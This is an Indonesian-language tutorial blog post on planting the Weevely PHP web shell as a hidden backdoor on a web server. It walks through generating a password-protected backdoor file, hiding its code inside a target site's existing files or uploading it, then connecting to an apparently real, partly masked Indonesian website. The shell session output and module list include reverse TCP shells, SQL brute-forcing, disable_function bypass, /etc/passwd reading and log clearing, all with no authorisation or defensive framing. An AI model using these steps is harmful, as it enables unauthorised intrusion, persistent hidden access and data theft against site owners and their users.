Cara Reverse Shell Menggunakan Weevely Di Linux

Weevely adalah PHP web shell backdor yang mensimulasikan koneksi seperti telnet. Ini adalah alat penting untuk eksploitasi pasca aplikasi web, dan dapat digunakan sebagai pintu belakang tersembunyi atau sebagai cangkang web untuk mengelola akun web yang sah, bahkan yang dihosting secara gratis.

Alat ini bisa kita gunakan sebagai pengganti back connect atau reverse shell ketika kita menemukan web server yang tidak dapat melakukan back connect, maka cara alternatifnya kita bisa menggunakan weevely sebagai reverse shell sekaligus backdor tersembunyi.

Fitur:

 

  • Akses shell ke target
  • Konsol SQL berputar pada target
  • Proxy HTTP/HTTPS untuk menelusuri target
  • Unggah dan unduh file
  • Memunculkan shell TCP terbalik dan langsung
  • Audit keamanan target jarak jauh
  • Pemindaian port berputar pada target
  • Pasang sistem file jarak jauh
  • Akun SQL Bruteforce berputar pada target

 

Alat ini bisa kita install melalui repository github project tools dari weevely, atau jika kalian adalah pengguna Kali Linux bisa kita instalasi dengan simple melalui cara di bawah ini.

sudo apt-get install weevely
weevely
┌─[zidan@ubuntu][~]>
└─[$]> weevely

[+] weevely 4.0.1
[!] Error: the following arguments are required: url, password

[+] Run terminal or command on the target
    weevely <URL> <password> [cmd]

[+] Recover an existing session
    weevely session <path> [cmd]

[+] Generate new agent
    weevely generate <password> <path>

Disana tertulis rangkuman dari cara pemakaian tools, pertama kita buat terlebih dahulu php webshell dari weevely dengan menggunakan command di bawah ini.

weevely generate xploit1337 bc.php

 

Untuk passwordnya xploit1337 dan nama file backdor bc.php bisa kalian ubah sesuai keinginan kalian sendiri, atau bisa di samakan juga seperti pada artikel ini.

 

Kemudian cek pada directory tempat kalian menjalankan tools weevely akan terdapat 1 file backdor yang barusan kita buat yaitu ‘bc.php’, kemudian buka menggunakan mousepad atau gedit.

Jika kalian ingin membuat backdor tersembunyi maka kita perlu menyalin isi files dari backdor yang sudah kita buat tadi ke dalam salah satu files yang ada pada web atau hosting target. Selama code tsb tidak terdeteksi maka kita akan bisa melakukan RCE (Remote Code Execution) melalui weevely. Atau bisa kita upload saja files backdor stb pada website target, kemudian untuk cara eksekusinya kita jalankan perintah di bawah ini.

weevely https://k******resmi.com/bc.php xploit1337
┌─[zidan@ubuntu][~]>
└─[$]> weevely https://k******resmi.com/bc.php xploit1337

[+] weevely 4.0.1

[+] Target:    k******resmi.com
[+] Session:    /home/zidan/.weevely/sessions/k******resmi.com/bc_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely>

Kemudian kita coba jalankan perintah ls untuk melihat isi dir dari website yang sudah kita tanamkan backdor reverse shell weevely. Jika menampilkan isi dari directory web maka kita berhasil melakukan reverse shell dengan menggunakan weevely.

Untuk penggunaan lebih lanjut pada tools weevely, kalian ketik help disana akan muncul cara pemakaian dan cara penggunaan fitur lainnya yang disediakan oleh weevely.

┌─[zidan@ubuntu][~]>
└─[$]> weevely https://k******resmi.com/bc.php xploit1337

[+] weevely 4.0.1

[+] Target:    k*****sco@t**h.a***ab.co.id:/home/k*****sco/public_html
[+] Session:    /home/zidan/.weevely/sessions/k******resmi.com/bc_0.session
[+] Shell:    System shell

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> help

 :file_read                    Read remote file from the remote filesystem.
 :file_check                   Get attributes and permissions of a file.
 :file_cp                      Copy single file.
 :file_cd                      Change current working directory.
 :file_clearlog                Remove string from a file.
 :file_edit                    Edit remote file on a local editor.
 :file_download                Download file from remote filesystem.
 :file_gzip                    Compress or expand gzip files.
 :file_mount                   Mount remote filesystem using HTTPfs.
 :file_enum                    Check existence and permissions of a list of paths.
 :file_zip                     Compress or expand zip files.
 :file_find                    Find files with given names and attributes.
 :file_grep                    Print lines matching a pattern in multiple files.
 :file_upload2web              Upload file automatically to a web folder and get corresponding URL.
 :file_upload                  Upload file to remote filesystem.
 :file_bzip2                   Compress or expand bzip2 files.
 :file_touch                   Change file timestamp.
 :file_tar                     Compress or expand tar archives.
 :file_webdownload             Download an URL.
 :file_ls                      List directory content.
 :file_rm                      Remove remote file.
 :net_scan                     TCP Port scan.
 :net_curl                     Perform a curl-like HTTP request.
 :net_phpproxy                 Install PHP proxy on the target.
 :net_proxy                    Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_mail                     Send mail.
 :net_ifconfig                 Get network interfaces addresses.
 :backdoor_reversetcp          Execute a reverse TCP shell.
 :backdoor_tcp                 Spawn a shell on a TCP port.
 :bruteforce_sql               Bruteforce SQL database.
 :sql_dump                     Multi dbms mysqldump replacement.
 :sql_console                  Execute SQL query or run console.
 :system_extensions            Collect PHP and webserver extension list.
 :system_procs                 List running processes.
 :system_info                  Collect system information.
 :audit_phpconf                Audit PHP configuration.
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_filesystem             Audit the file system for weak permissions.
 :audit_suidsgid               Find files with SUID or SGID flags.
 :audit_etcpasswd              Read /etc/passwd with different techniques.
 :shell_php                    Execute PHP commands.
 :shell_sh                     Execute shell commands.
 :shell_su                     Execute commands with su.

k*****sco@t**h.a***ab.co.id:/home/k*****sco/public_html $

Itulah tadi cara Back Connect atau Reverse Shell alternatif dengan menggunakan tools weevely di kali linux, tools ini juga bisa kita gunakan di aplikasi android yaitu termux. Hanya saja cara instalasinya berbeda dengan cara di atas, untuk instalasi bagi pengguna termux bisa kunjungi langsung repository github weevely.